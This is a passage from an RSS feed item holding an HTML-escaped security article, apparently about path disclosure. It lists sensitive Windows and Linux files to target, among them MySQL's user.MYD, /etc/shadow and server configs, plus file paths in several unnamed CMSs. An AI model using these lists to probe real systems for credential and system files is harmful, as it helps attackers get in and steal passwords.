c:&lt;span class="se"&gt;\P&lt;/span&gt;rogramFiles&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\m&lt;/span&gt;y.ini

&lt;span class="c"&gt;# MySQL root password&lt;/span&gt;
c:&lt;span class="se"&gt;\P&lt;/span&gt;rogramFiles&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\d&lt;/span&gt;ata&lt;span class="se"&gt;\m&lt;/span&gt;ysql&lt;span class="se"&gt;\u&lt;/span&gt;ser.MYD

&lt;span class="c"&gt;# PHP configuration information&lt;/span&gt;
c:&lt;span class="se"&gt;\w&lt;/span&gt;indows&lt;span class="se"&gt;\p&lt;/span&gt;hp.ini
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Linux
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Basic Linux privilege escalation paths:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Account information&lt;/span&gt;
/etc/passwd

&lt;span class="c"&gt;# Account password file&lt;/span&gt;
/etc/shadow

&lt;span class="c"&gt;# Apache2 default configuration file&lt;/span&gt;
/usr/local/app/apache2/conf/httpd.conf

&lt;span class="c"&gt;# Virtual website configuration&lt;/span&gt;
/usr/local/app/apache2/conf/extra/httpd-vhost.conf

&lt;span class="c"&gt;# PHP configuration file&lt;/span&gt;
/usr/local/app/php5/lib/php.ini

&lt;span class="c"&gt;# Apache configuration file&lt;/span&gt;
/etc/httpd/conf/httpd.conf

&lt;span class="c"&gt;# MySQL configuration file&lt;/span&gt;
/etc/my.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  0x04 Common CMS Examples
&lt;/h2&gt;

&lt;h3&gt;
  
  
  CMS-A
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/member/templets/menulit.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-B
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/wp-admin/includes/file.php
/wp-content/themes/theme-name/footer.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-C
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-D
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/cms-root/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  CMS-E
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>vulnerabilities</category>
      <category>directory</category>
      <category>cybersecurity</category>
      <category>path</category>
    </item>
  </channel>
</rss>
